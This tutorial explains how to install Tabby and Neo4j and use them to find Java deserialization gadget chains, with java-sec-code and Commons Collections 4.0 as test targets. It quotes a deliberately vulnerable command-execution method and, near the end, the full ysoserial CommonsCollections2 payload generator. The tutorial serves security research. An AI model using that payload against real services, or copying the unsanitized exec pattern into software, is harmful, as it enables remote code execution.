# TABBY AND NEO4J TUTORIAL

## Environment

Before setting up the tools, ensure you have the following prerequisites installed:

**`docker, maven, jdk-21 (default), jdk-8`**

## Workflow

Before setting up the tools, it helps to understand what each of them does.

### Tabby

Tabby is a static analysis framework designed specifically for detecting Java deserialization gadget chains. It addresses the complexity of manual auditing by converting Java bytecode (from JAR files) into a **Code Property Graph (CPG)**.

Its workflow involves two main phases:

- **Semantic Information Extraction**: It uses the Soot framework to parse Java classes and methods, extracting relationships like inheritance (Extend, Interface), aliases (Alias), and method calls (Call).
- **Controllability Analysis**: Tabby applies a taint analysis algorithm to determine which variables and method calls are controllable by user input, pruning uncontrollable paths to optimize the graph.

### Neo4j

Neo4j itself does not perform vulnerability detection. It serves as a graph backend that stores Tabby’s CPG and executes Cypher queries issued by tabby-vul-finder or tabby-path-finder. By mapping Java code structures into graph nodes (Classes, Methods) and edges (Calls, Aliases), Neo4j allows security researchers to:

- **Query Chains:** Use the Cypher query language to search for connected paths between a Source (e.g., readObject) and a Sink (e.g., Runtime.exec).
- **Visualize Attacks:** Graphically represent complex gadget chains, making it easier to understand how a vulnerability flows through multiple libraries.
- **Automate Detection:** Work in conjunction with the plugin `tabby-path-finder` and the external engine `tabby-vul-finder` to automatically traverse the graph and identify potential exploits.

**Discovery scenario:**

```graphql
|1. Build CPG & Generate CSVs (tabby-core)|
                    |
                    v
|2. Load Data (tabby-vul-finder)|
                    |
                    v
|3. Query & Discovery (tabby-vul-finder)|
                    |
                    v
|4. Visualization (Neo4j browser)|
```

## Tabby installation

```bash
git clone https://github.com/wh1t3p1g/tabby.git
cd tabby
mvn clean package -DskipTests
```

Copy the following code to `run.sh` and make it executable (`chmod +x run.sh`):

```bash!
#!/bin/bash
# Wrapper around tabby and tabby-vul-finder; the first argument selects the action.
if [ "$1" = 'build' ]
then
    echo "start to run tabby"
    java -Xmx8g -Xss512m -jar target/tabby.jar
elif [ "$1" = 'load' ]
then
    java -jar tabby-vul-finder.jar --load "$2"
elif [ "$1" = 'query' ]
then
    java -jar tabby-vul-finder.jar --query "$2" --prefix "$3"
elif [ "$1" = 'pack' ]
then
    tar -czvf output.tar.gz ./output/*.csv
fi
```

## Set up java-sec-code to test

```bash
git clone https://github.com/JoyChou93/java-sec-code.git
cd java-sec-code
JAVA_HOME=/path/to/jdk-8 mvn clean package -DskipTests
mkdir -p /path/to/tabby/cases
cp target/java-sec-code-1.0.0.jar /path/to/tabby/cases
```

## Run tabby

Go to `tabby/` and edit `settings.properties` as follows:

```yaml
# targets to analyse
tabby.build.target = cases/java-sec-code-1.0.0.jar
tabby.build.libraries = libs
# important: gadget or web
tabby.build.mode = web
# tabby.build.mode = gadget
tabby.output.directory = ./output/dev
tabby.build.rules.directory = ./rules
tabby.build.thread.size = 2

# settings for jre environments
# important: set to false to use the system JRE
tabby.build.useSettingJRE = true
tabby.build.isJRE9Module = false
tabby.build.javaHome = /usr/lib/jvm/java-8-openjdk-amd64

# debug
tabby.debug.details = false
tabby.debug.print.current.methods = true

# jdk settings
tabby.build.isJDKProcess = false
# important: set to true to include all JDK classes in the analysis
tabby.build.withAllJDK = false
tabby.build.isJDKOnly = false

# dealing fatjar
tabby.build.checkFatJar = true

# set false for debug
tabby.build.removeNotPollutedCallSite = true

# pointed-to analysis types
tabby.build.interProcedural = true
tabby.build.onDemandDrive = false

# pointed-to analysis settings
tabby.build.analysis.everything = true
tabby.build.isPrimTypeNeedToCreate = false
tabby.build.thread.timeout = 2
tabby.build.method.timeout = 5
tabby.build.alias.maxCount = 5
tabby.build.array.maxLength = 25
tabby.build.method.maxDepth = 500
tabby.build.method.maxBodyCount = 8000
tabby.build.method.maxLocalCount = 2000
tabby.build.object.maxTriggerTimes = 300
tabby.build.object.field.k.limit = 10
tabby.build.with.cache.enable = false
tabby.build.isNeedToCreateIgnoreList = false
tabby.build.isNeedToDealNewAddedMethod = true
tabby.build.timeout.forceStop = true

# plugin settings
tabby.build.isNeedToProcessXml = true
```

```bash
./run.sh build
```

**Note**: If you encounter an "OOM Error" or the process crashes suddenly, check your available RAM and swap using `free -h`, then adjust the JVM options (`-Xmx`, `-Xss`) in the `build` branch of `run.sh` accordingly.

When the process finishes, check the output in `tabby/output/dev`:

```bash
ls output/dev
```

The output should be:

```
GRAPHDB_PUBLIC_ALIAS.csv  GRAPHDB_PUBLIC_CLASSES.csv  GRAPHDB_PUBLIC_HAS.csv         GRAPHDB_PUBLIC_METHODS.csv
GRAPHDB_PUBLIC_CALL.csv   GRAPHDB_PUBLIC_EXTEND.csv   GRAPHDB_PUBLIC_INTERFACES.csv
```

## Set up Neo4j

To use Neo4j with Tabby, you need the following Tabby tools and plugins.
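Before installing the plugins, it may be worth confirming that the build step produced every CSV file listed above, since the later load step imports them. The following is a minimal sketch: the function name `check_tabby_output` is hypothetical, and the file list is simply copied from the expected `ls` output.

```bash
# Hypothetical helper (not part of tabby): report which of the expected
# CSV files are missing from the given output directory.
check_tabby_output() {
  local dir="${1:-output/dev}"
  local missing=0
  local name
  for name in ALIAS CLASSES HAS METHODS CALL EXTEND INTERFACES; do
    if [ ! -f "$dir/GRAPHDB_PUBLIC_${name}.csv" ]; then
      echo "missing: $dir/GRAPHDB_PUBLIC_${name}.csv"
      missing=1
    fi
  done
  # Exit status 0 means all seven files exist, 1 means at least one is absent.
  return "$missing"
}
```

For example, `check_tabby_output output/dev && echo "all CSV files present"` run from `tabby/`.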
### tabby-vul-finder

```bash
git clone https://github.com/wh1t3p1g/tabby-vul-finder.git
cd tabby-vul-finder
```

Set the Lombok version in `pom.xml` to one that supports your JDK (for example 1.18.30, the first release with JDK 21 support):

```xml
<dependency>
    <groupId>org.projectlombok</groupId>
    <artifactId>lombok</artifactId>
    <version>1.18.30</version>
    <scope>provided</scope>
</dependency>
```

Change `src/main/java/tabby/vul/finder/core/Loader.java` to the following:

```java
package tabby.vul.finder.core;

import lombok.extern.slf4j.Slf4j;
import org.neo4j.driver.Driver;
import org.neo4j.driver.Session;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.stereotype.Component;
import tabby.vul.finder.dal.service.ClassService;
import tabby.vul.finder.dal.service.MethodService;

import java.util.Arrays;
import java.util.List;
import java.util.concurrent.TimeUnit;

/**
 * @author wh1t3p1g
 * @since 2023/3/8
 */
@Slf4j
@Component
public class Loader {

    @Autowired
    private ClassService classService;

    @Autowired
    private MethodService methodService;

    @Autowired
    private Driver driver;

    public void load(){
        long start = System.nanoTime();
        classService.clear(); // clean old data
        createIndexes();      // constraints and indexes must exist before the import
        log.info("Try to load data.");
        methodService.importMethodRef();
        classService.importClassRef();
        classService.buildEdge();
        classService.statistic();
        long time = TimeUnit.NANOSECONDS.toSeconds(System.nanoTime() - start);
        log.info("Cost {} min {} seconds.", time/60, time%60);
    }

    private void createIndexes() {
        log.info("Start creating constraints and indexes...");
        // Neo4j 5 syntax: FOR ... REQUIRE for constraints, FOR ... ON for indexes
        List<String> cyphers = Arrays.asList(
                "CREATE CONSTRAINT c1 IF NOT EXISTS FOR (c:Class) REQUIRE c.ID IS UNIQUE",
                "CREATE CONSTRAINT c2 IF NOT EXISTS FOR (c:Class) REQUIRE c.NAME IS UNIQUE",
                "CREATE CONSTRAINT c3 IF NOT EXISTS FOR (m:Method) REQUIRE m.ID IS UNIQUE",
                "CREATE CONSTRAINT c4 IF NOT EXISTS FOR (m:Method) REQUIRE m.SIGNATURE IS UNIQUE",
                "CREATE INDEX index1 IF NOT EXISTS FOR (m:Method) ON (m.NAME)",
                "CREATE INDEX index2 IF NOT EXISTS FOR (m:Method) ON (m.CLASSNAME)",
                "CREATE INDEX index3 IF NOT EXISTS FOR (m:Method) ON (m.NAME, m.CLASSNAME)",
                "CREATE INDEX index4 IF NOT EXISTS FOR (m:Method) ON (m.NAME, m.NAME0)",
                "CREATE INDEX index5 IF NOT EXISTS FOR (m:Method) ON (m.SIGNATURE)",
                "CREATE INDEX index6 IF NOT EXISTS FOR (m:Method) ON (m.NAME0)",
                "CREATE INDEX index7 IF NOT EXISTS FOR (m:Method) ON (m.NAME0, m.CLASSNAME)"
        );

        try (Session session = driver.session()) {
            for (String cypher : cyphers) {
                try {
                    // strip a trailing semicolon, if any, before sending the statement
                    String cleanCypher = cypher.trim().replaceAll(";$", "");
                    session.run(cleanCypher);
                } catch (Exception e) {
                    // a failed statement is logged and skipped so the rest still run
                    log.warn("Failed to execute cypher: {}. Error: {}", cypher, e.getMessage());
                }
            }
        }
        log.info("Constraints and indexes created successfully.");
    }
}
```

Build:

```bash
mvn clean package -DskipTests
cp target/tabby-vul-finder.jar /path/to/tabby
cp rules/cyphers.yml /path/to/tabby/rules
```

### tabby-path-finder

```bash
git clone https://github.com/tabby-sec/tabby-path-finder
cd tabby-path-finder
```

As above, change the Lombok version in `pom.xml` to one that supports your JDK.
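To see which Lombok version a `pom.xml` currently declares before editing it, a small lookup like the one below can help. This is a sketch under assumptions: the `lombok_version` name is hypothetical, and it only works when `<artifactId>` and `<version>` sit on separate lines of the same `<dependency>` element, as in the snippet shown earlier.

```bash
# Hypothetical helper: print the version declared for the lombok dependency.
# Prints nothing if the dependency has no <version> of its own.
lombok_version() {
  awk '
    /<artifactId>lombok<\/artifactId>/ { found = 1; next }
    found && /<\/dependency>/          { exit }
    found && /<version>/ {
      gsub(/.*<version>|<\/version>.*/, "")
      print
      exit
    }
  ' "${1:-pom.xml}"
}
```

Running `lombok_version pom.xml` in the repository root prints the declared version string, which may also be a Maven property reference if the project defines the version that way.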
Build:

```bash
mvn clean package -DskipTests
mkdir -p /path/to/tabby/plugins
cp target/tabby-path-finder-1.1.jar /path/to/tabby/plugins
```

### Neo4j

```bash
cd /path/to/tabby
wget "https://github.com/neo4j-contrib/neo4j-apoc-procedures/releases/download/5.20.0/apoc-5.20.0-extended.jar" -O plugins/apoc-5.20.0-extended.jar
mkdir -p config
touch config/db.properties
```

Paste the following config into `config/db.properties`:

```
tabby.neo4j.url=bolt://localhost:7687
tabby.neo4j.username=neo4j
tabby.neo4j.password=<YOUR_PASSWORD>
tabby.cache.isDockerImportPath=true
```

Make sure you are in `tabby/`, then create `run_docker.sh` (remember to replace `<YOUR_PASSWORD>` with your own password) and make it executable:

```bash
#!/bin/bash

# Stop the running container if it exists (avoid auto-restart issues)
docker stop neo4j 2>/dev/null || true

# Remove the container if it exists
docker rm -f neo4j 2>/dev/null || true

# Start Neo4j container
docker run \
    --name neo4j \
    -p 7474:7474 -p 7687:7687 \
    -d \
    --restart unless-stopped \
    --memory=8gb \
    --memory-swap=8gb \
    -v "$PWD/output:/var/lib/neo4j/import" \
    -v "$PWD/plugins:/plugins" \
    -v "$PWD/neo4j_data:/data" \
    -e NEO4J_AUTH='neo4j/<YOUR_PASSWORD>' \
    -e NEO4J_server_memory_heap_initial__size=5G \
    -e NEO4J_server_memory_heap_max__size=5G \
    -e NEO4J_server_memory_pagecache_size=1G \
    -e NEO4J_dbms_memory_transaction_total_max=0 \
    -e NEO4J_apoc_export_file_enabled=true \
    -e NEO4J_apoc_import_file_enabled=true \
    -e NEO4J_dbms_security_procedures_unrestricted='apoc.*,tabby.*' \
    -e NEO4J_PLUGINS='["apoc"]' \
    neo4j:5.20.0
```

**Note:** You can adjust the memory settings (`--memory`, heap and page cache sizes) to fit your machine.
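Because `run_docker.sh` mounts `plugins/` and `output/` relative to the current directory, a quick pre-flight check can catch a missing jar or a wrong working directory before the container starts. The sketch below is an assumption-laden convenience, not part of tabby: the `preflight` name is hypothetical and the jar names are the ones used in the commands above.

```bash
# Hypothetical pre-flight check; pass the tabby/ directory (defaults to ".").
preflight() {
  local root="${1:-.}"
  local status=0
  local path
  # Jars that the container expects to find in the mounted plugins directory.
  for path in plugins/tabby-path-finder-1.1.jar plugins/apoc-5.20.0-extended.jar; do
    if [ ! -f "$root/$path" ]; then
      echo "missing file: $root/$path"
      status=1
    fi
  done
  # The CSV output directory is mounted as Neo4j's import directory.
  if [ ! -d "$root/output" ]; then
    echo "missing directory: $root/output"
    status=1
  fi
  return "$status"
}
```

For example, `preflight . && ./run_docker.sh` only starts the container when both jars and the output directory are in place.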
Run Neo4j:

```bash
./run_docker.sh
```

Wait for Neo4j to finish starting, then load the data:

```bash
./run.sh load dev
```

![image](https://hackmd.io/_uploads/HyCFC-2GZg.png)

Open http://localhost:7474/browser/, log in, and run these queries to check the integration with tabby:

```sql
SHOW PROCEDURES YIELD name WHERE name STARTS WITH 'tabby' RETURN name
```

```sql
CALL tabby.version();
```

**Note:** If you run into memory-related issues with Neo4j, remove the container and adjust the memory settings in `run_docker.sh`.

## Neo4j query

Count the classes and methods loaded into the graph:

```sql
CALL { MATCH (c:Class) RETURN count(c) AS classes }
CALL { MATCH (m:Method) RETURN count(m) AS methods }
RETURN classes, methods;
```

Count the call relationships between methods (the number of `CALL` edges):

```sql
MATCH (m1:Method)-[r:CALL]->(m2:Method)
RETURN count(r) as total_chains;
```

Show one path from a source (web endpoint) to a sink (Runtime.exec):

```sql
MATCH (source:Method {IS_ENDPOINT: true})
MATCH (sink:Method {IS_SINK: true, VUL: "EXEC"})
CALL tabby.beta.findPath(source, "-", sink, 8, false) YIELD path
RETURN path LIMIT 1
```

![image](https://hackmd.io/_uploads/r1sE2g2GWl.png)

The image shows that the command-execution sink can be reached from a web endpoint with only two method invocations:

```java
CommandExec(String) -> Runtime.exec(String) -> Runtime.exec(String, String[], File)
```

Source code reference:

```java
public String CommandExec(String cmd) {
    Runtime run = Runtime.getRuntime();
    StringBuilder sb = new StringBuilder();

    try {
        Process p = run.exec(cmd);
        BufferedInputStream in = new BufferedInputStream(p.getInputStream());
        BufferedReader inBr = new BufferedReader(new InputStreamReader(in));
        String tmpStr;

        while ((tmpStr = inBr.readLine()) != null) {
            sb.append(tmpStr);
        }

        if (p.waitFor() != 0) {
            if (p.exitValue() == 1)
                return "Command exec failed!!";
        }

        inBr.close();
        in.close();
    } catch (Exception e) {
        return e.toString();
    }
    return sb.toString();
}
```

Run an automated query with the default `cyphers.yml` shipped with `tabby-vul-finder` to find general web vulnerabilities:

```
./run.sh query rules/cypher <name>
```

Result:

![image](https://hackmd.io/_uploads/SknZ0f2MWl.png)

**Note:** To hunt gadget chains, you MUST enable the following parameters in `settings.properties` and rebuild:

```yaml!
...
tabby.build.mode = gadget
tabby.build.withAllJDK = true
...
```

## Other test cases

### CVE-2021-43297

```sql
match (source:Method {NAME:"toString"})
match (sink:Method {IS_SINK: true, NAME: "invoke"})
call tabby.beta.findPath(source, "<", sink, 6, true) yield path
where none(n in nodes(path) where n.CLASSNAME in [
    "java.io.ObjectInputStream",
    "com.oracle.webservices.internal.api.message.BasePropertySet$Accessor",
    "javax.imageio.ImageIO$ContainsFilter",
    "java.security.PrivilegedAction"
])
return path limit 1
```

![image](https://hackmd.io/_uploads/rJP8-P3zWx.png)

![image](https://hackmd.io/_uploads/rJXR7PhMbe.png)

```graphql
[Source] javax.swing.MultiUIDefaults.toString()
    └──> calls javax.swing.MultiUIDefaults.get()
        └──> calls javax.swing.UIDefaults.get()
            └──> calls javax.swing.UIDefaults.getFromHashtable()
                └──> [Interface Invoke] javax.swing.UIDefaults$LazyValue.createValue()
                    └──> [Impl] sun.swing.SwingLazyValue.createValue()
                        └──> [Sink] java.lang.reflect.Method.invoke()
```

### CC2 gadget chain (Commons Collections 4.0)

The following setup manually rediscovers the well-known CC2 and CC4 gadget chains.
#### Setup

Download Commons Collections 4.0 and copy it to the `cases` directory that `settings.properties` points to:

```
wget "https://repo1.maven.org/maven2/org/apache/commons/commons-collections4/4.0/commons-collections4-4.0.jar"
cp commons-collections4-4.0.jar /path/to/tabby/cases
```

Configure `settings.properties`:

```
# targets to analyse
tabby.build.target = cases/commons-collections4-4.0.jar
tabby.build.libraries = libs
tabby.build.mode = gadget
tabby.output.directory = ./output/dev
tabby.build.rules.directory = ./rules
tabby.build.thread.size = 2

# settings for jre environments
tabby.build.useSettingJRE = true
tabby.build.isJRE9Module = false
tabby.build.javaHome = <PATH_TO_JDK-8>

# debug
tabby.debug.details = false
tabby.debug.print.current.methods = true

# jdk settings
tabby.build.isJDKProcess = false
tabby.build.withAllJDK = true
tabby.build.isJDKOnly = false

# dealing fatjar
tabby.build.checkFatJar = true

# set false for debug
tabby.build.removeNotPollutedCallSite = true

# pointed-to analysis types
tabby.build.interProcedural = true
tabby.build.onDemandDrive = false

# pointed-to analysis settings
tabby.build.analysis.everything = true
tabby.build.isPrimTypeNeedToCreate = false
tabby.build.thread.timeout = 2
tabby.build.method.timeout = 5
tabby.build.alias.maxCount = 5
tabby.build.array.maxLength = 25
tabby.build.method.maxDepth = 500
tabby.build.method.maxBodyCount = 8000
tabby.build.method.maxLocalCount = 2000
tabby.build.object.maxTriggerTimes = 300
tabby.build.object.field.k.limit = 10
tabby.build.with.cache.enable = false
tabby.build.isNeedToCreateIgnoreList = false
tabby.build.isNeedToDealNewAddedMethod = true
tabby.build.timeout.forceStop = true

# plugin settings
tabby.build.isNeedToProcessXml = true
```

Stop and remove the Neo4j container so that its data directory is no longer in use:

```bash
docker stop neo4j
docker rm -f neo4j
```

Remove the old results:

```
cd tabby/
sudo rm -rf output/dev/*
sudo rm -rf neo4j_data/*
```

Build:

```
./run.sh build
```

Start the Neo4j container again with `./run_docker.sh`, as above.
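Waiting for the container to come up can be scripted instead of done by hand. The helper below is a minimal sketch: `wait_until` is a hypothetical name, and the usage line assumes `curl` is installed and that the Neo4j HTTP port is published on `localhost:7474` as in `run_docker.sh`. A successful HTTP response is only a rough readiness signal.

```bash
# wait_until RETRIES DELAY_SECONDS COMMAND [ARGS...]
# Hypothetical helper: re-run COMMAND until it succeeds, giving up after
# RETRIES failed attempts. Returns 0 on success and 1 on timeout.
wait_until() {
  local retries="$1"
  local delay="$2"
  shift 2
  local attempt=0
  while [ "$attempt" -lt "$retries" ]; do
    if "$@" >/dev/null 2>&1; then
      return 0
    fi
    attempt=$((attempt + 1))
    sleep "$delay"
  done
  return 1
}
```

For example, `wait_until 30 2 curl -sf http://localhost:7474` polls the HTTP endpoint every two seconds for up to about a minute before giving up.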
Wait until it has fully started, then load the data with `./run.sh load dev` as before. The modified `Loader` **creates the indexes** as part of loading.

#### Query

Cypher rule:

```yaml
# cyphers.yml
name: "commons_collections4_cc2_cc4"
enable: true
type: "gadget"
source:
  type: "source"
  cypher: "match (source:Method {NAME:\"readObject\",CLASSNAME:\"java.util.PriorityQueue\"})"
sink:
  type: "sink"
  sink: true
  name: "invoke"
depth: 10
limit: 1
direct: "<"
depthFirst: true
procedure: "tabby.algo.findPath"
sourceBlacklists: []
pathBlacklists:
  - java.io.ObjectInputStream#defaultReadObject
  - java.io.ObjectInputStream#readObject
```

Explanation: This rule attempts to find a gadget chain. It takes `java.util.PriorityQueue.readObject()` as the entry point and searches for a call path, at most 10 nodes long, that connects it to the dangerous sink method `invoke`.

**Note:** We target `Method.invoke` instead of `Runtime.exec` because the gadget chain relies on Java reflection. Static analysis detects the code path that calls `invoke`, whereas `Runtime.exec` is merely the payload dynamically injected into it at runtime.

**Result:**

```
/*
java.util.PriorityQueue#readObject
-[CALL]-> java.util.PriorityQueue#heapify
-[CALL]-> java.util.PriorityQueue#siftDown
-[CALL]-> java.util.PriorityQueue#siftDownUsingComparator
-[CALL]-> java.util.Comparator#compare
-[ALIAS]-> org.apache.commons.collections4.comparators.TransformingComparator#compare
-[CALL]-> org.apache.commons.collections4.Transformer#transform
-[ALIAS]-> org.apache.commons.collections4.functors.InvokerTransformer#transform
-[CALL]-> java.lang.reflect.Method#invoke
*/
match path=(m16:Method {NAME0:"java.util.PriorityQueue#readObject"})
-[:CALL]-> (m14:Method {NAME0:"java.util.PriorityQueue#heapify"})
-[:CALL]-> (m12:Method {NAME0:"java.util.PriorityQueue#siftDown"})
-[:CALL]-> (m10:Method {NAME0:"java.util.PriorityQueue#siftDownUsingComparator"})
-[:CALL]-> (m8:Method {NAME0:"java.util.Comparator#compare"})
-[:ALIAS]-> (m6:Method {NAME0:"org.apache.commons.collections4.comparators.TransformingComparator#compare"})
-[:CALL]-> (m4:Method {NAME0:"org.apache.commons.collections4.Transformer#transform"})
-[:ALIAS]-> (m2:Method {NAME0:"org.apache.commons.collections4.functors.InvokerTransformer#transform"})
-[:CALL]-> (m0:Method {NAME0:"java.lang.reflect.Method#invoke"})
return path
```

```graphql
[Source] java.util.PriorityQueue.readObject()
    └──> calls java.util.PriorityQueue.heapify()
        └──> calls java.util.PriorityQueue.siftDown()
            └──> calls java.util.PriorityQueue.siftDownUsingComparator()
                └──> [Interface Invoke] java.util.Comparator.compare()
                    └──> [Impl] org.apache.commons.collections4.comparators.TransformingComparator.compare()
                        └──> calls org.apache.commons.collections4.Transformer.transform()
                            └──> [Impl] org.apache.commons.collections4.functors.InvokerTransformer.transform()
                                └──> [Sink] java.lang.reflect.Method.invoke()
```

**Visualize on Neo4j:**

![image](https://hackmd.io/_uploads/rkfBAGsGZx.png)

**`ysoserial`** payload source:

```java
package ysoserial.payloads;

import java.util.PriorityQueue;
import java.util.Queue;

import org.apache.commons.collections4.comparators.TransformingComparator;
import org.apache.commons.collections4.functors.InvokerTransformer;

import ysoserial.payloads.annotation.Authors;
import ysoserial.payloads.annotation.Dependencies;
import ysoserial.payloads.util.Gadgets;
import ysoserial.payloads.util.PayloadRunner;
import ysoserial.payloads.util.Reflections;

/*
    Gadget chain:
        ObjectInputStream.readObject()
            PriorityQueue.readObject()
                ...
                    TransformingComparator.compare()
                        InvokerTransformer.transform()
                            Method.invoke()
                                Runtime.exec()
 */

@SuppressWarnings({ "rawtypes", "unchecked" })
@Dependencies({ "org.apache.commons:commons-collections4:4.0" })
@Authors({ Authors.FROHOFF })
public class CommonsCollections2 implements ObjectPayload<Queue<Object>> {

    public Queue<Object> getObject(final String command) throws Exception {
        final Object templates = Gadgets.createTemplatesImpl(command);
        // mock method name until armed
        final InvokerTransformer transformer = new InvokerTransformer("toString", new Class[0], new Object[0]);

        // create queue with numbers and basic comparator
        final PriorityQueue<Object> queue = new PriorityQueue<Object>(2,new TransformingComparator(transformer));
        // stub data for replacement later
        queue.add(1);
        queue.add(1);

        // switch method called by comparator
        Reflections.setFieldValue(transformer, "iMethodName", "newTransformer");

        // switch contents of queue
        final Object[] queueArray = (Object[]) Reflections.getFieldValue(queue, "queue");
        queueArray[0] = templates;
        queueArray[1] = 1;

        return queue;
    }

    public static void main(final String[] args) throws Exception {
        PayloadRunner.run(CommonsCollections2.class, args);
    }
}
```

**Conclusion:** tabby-vul-finder successfully rediscovered the CC2 chain.